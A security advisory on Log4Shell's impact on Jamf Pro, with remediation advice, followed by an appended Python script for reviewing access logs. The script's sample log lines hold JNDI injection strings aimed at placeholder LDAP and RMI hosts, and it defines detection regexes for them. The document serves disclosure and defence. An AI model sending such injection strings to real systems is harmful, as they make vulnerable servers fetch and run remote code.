December 11, 2021

Jamf Pro: Log4Shell Impact & Remediations

By: Randori Attack Team

Update Regarding Exploitability of JAMF Pro:

Last Update: 3:22pm EST, Dec. 11, 2021

Following the acknowledgement of products affected by Log4j, Randori can confirm the exploitability of Jamf Pro (security notice) via the Log4j vulnerability CVE-2021-44228, also known as “Log4Shell.” Recent unpatched versions of Jamf Pro, including those running on Java 11, are not protected against this exploitation and should not be considered protected. Due to the severity of impact from the exploit (RCE) and the widespread use of this Java library, Randori recommends this vulnerability be addressed immediately.

Randori’s Attack Team has validated exploitability with working exploits that achieve code execution via unauthenticated network vectors specifically on Jamf Pro and anticipates widespread exploitation by threat actors imminently. Randori does not release proof-of-concept code. The validated exploits include Jamf Pro 10.34.0 running on Java 11.

Based on our experience exploiting this vulnerability, we suggest organizations running Jamf Pro on-premises take the following steps to reduce their risks at this time:

  • Review guidance provided by JAMF. Specifically, upgrade to 10.34.1 or later.

Randori’s Attack Team has confirmed that current exploitation techniques do not affect Jamf version 10.34.1.

Randori has observed cloud-hosted Jamf Pro instances reporting version numbers consistent with exploitability, but Jamf has reported that cloud-hosted instances are mitigated. Randori’s Attack Team has not independently verified the efficacy or extent of those mitigations, and recommends treating any Jamf Pro instance prior to 10.34.1 as exploitable.

Situation Report: Jamf Impact from Log4Shell

A high-severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 library was disclosed publicly via the project’s GitHub on December 9, 2021. This vulnerability impacts multiple Jamf products. The Randori Attack Team can confirm exploitability of Jamf products in live environments via Log4j (CVE-2021-44228), aka “Log4Shell”.

This is a critical vulnerability and impacted organizations should take immediate action. This post will be regularly updated, but follow @RandoriAttack for immediate updates.

Impact

The Log4j 2 library is very frequently used in enterprise Java software. As with other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe an increasing number of vulnerable products will be discovered in the weeks to come. Randori has validated exploitability with a working exploit and anticipates widespread exploitation by threat actors imminently. Randori has been in contact with the Jamf team to assist their development of mitigations.

Impacted products:

  • Jamf Pro (on-prem)
    • Versions up to and including 10.34.0 are remotely exploitable, including those running on Java 11.
  • Jamf Pro (cloud)
    • Jamf asserts these instances have been mitigated. This claim has not been validated by Randori.

Remediations & Recommendations

If running a vulnerable version of Jamf Pro, Randori recommends organizations take immediate action and do the following:

  • Implement default-deny for outbound network connections initiated by the Jamf server.
  • Patch.
  • Assume compromise and review logs for signs of malicious activity.
  • Monitor our Log4Shell Attacker Note for impact of Log4Shell beyond Jamf.
  • Follow @RandoriAttack for updates.

If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.
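One way to start the log review recommended above, as an added example rather than Randori's or Jamf's own tooling: it parses constructed web-server access-log lines (hypothetical clients, hosts and paths), flags a JNDI lookup in any client-controlled field as high severity, and flags any other Log4j-style `${...}` lookup syntax as low severity so that obfuscated variants still surface for a human to inspect. It assumes the combined access-log shape shown in the samples; Jamf Pro's own server logs would need their own line pattern.

```python
import re

# Constructed sample lines (hypothetical hosts, paths and addresses) in the combined
# access-log shape: client, timestamp, request line, status, size, referer, user-agent.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /api/v1/ping HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:03:40 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:41 +0000] "GET /login HTTP/1.1" 200 512 "-" "${JNDI:rmi://scanner.invalid/b}"',
    '10.0.0.7 - - [10/Dec/2021:14:05:02 +0000] "GET /search?q=${price} HTTP/1.1" 200 88 "-" "curl/7.79"',
]

# HIGH: a JNDI lookup in a client-controlled field (case-insensitive, whitespace tolerated).
# LOW: any Log4j lookup syntax at all; variants that hide the "jndi" token still begin with "${",
# so a reviewer should look at these by hand rather than trusting the narrow signature alone.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")

# Fields an unauthenticated client controls: request line, referer, user-agent.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'\d+ \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
CLIENT_FIELDS = ("request", "referer", "agent")


def classify(line):
    """Return (severity, field, client) for one line, or None if nothing was found."""
    m = LINE_RE.match(line)
    if not m:
        # Never silently drop lines the parser cannot handle; surface them for review.
        return ("unparsed", None, None)
    for field in CLIENT_FIELDS:
        if JNDI_LOOKUP.search(m.group(field)):
            return ("high", field, m.group("client"))
    for field in CLIENT_FIELDS:
        if ANY_LOOKUP.search(m.group(field)):
            return ("low", field, m.group("client"))
    return None


def review(lines):
    """Return a list of (line_no, severity, field, client) for every line worth a look."""
    findings = []
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            findings.append((n, *hit))
    return findings


if __name__ == "__main__":
    for n, sev, field, client in review(SAMPLE_LOGS):
        print(f"line {n}: {sev.upper():8} field={field} client={client}")
```

A hit here tells you which client and field carried the lookup, not whether the server actually resolved it; pair it with the outbound default-deny above and check the firewall's denied-connection log for LDAP, RMI or DNS attempts from the Jamf host around the same timestamps.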
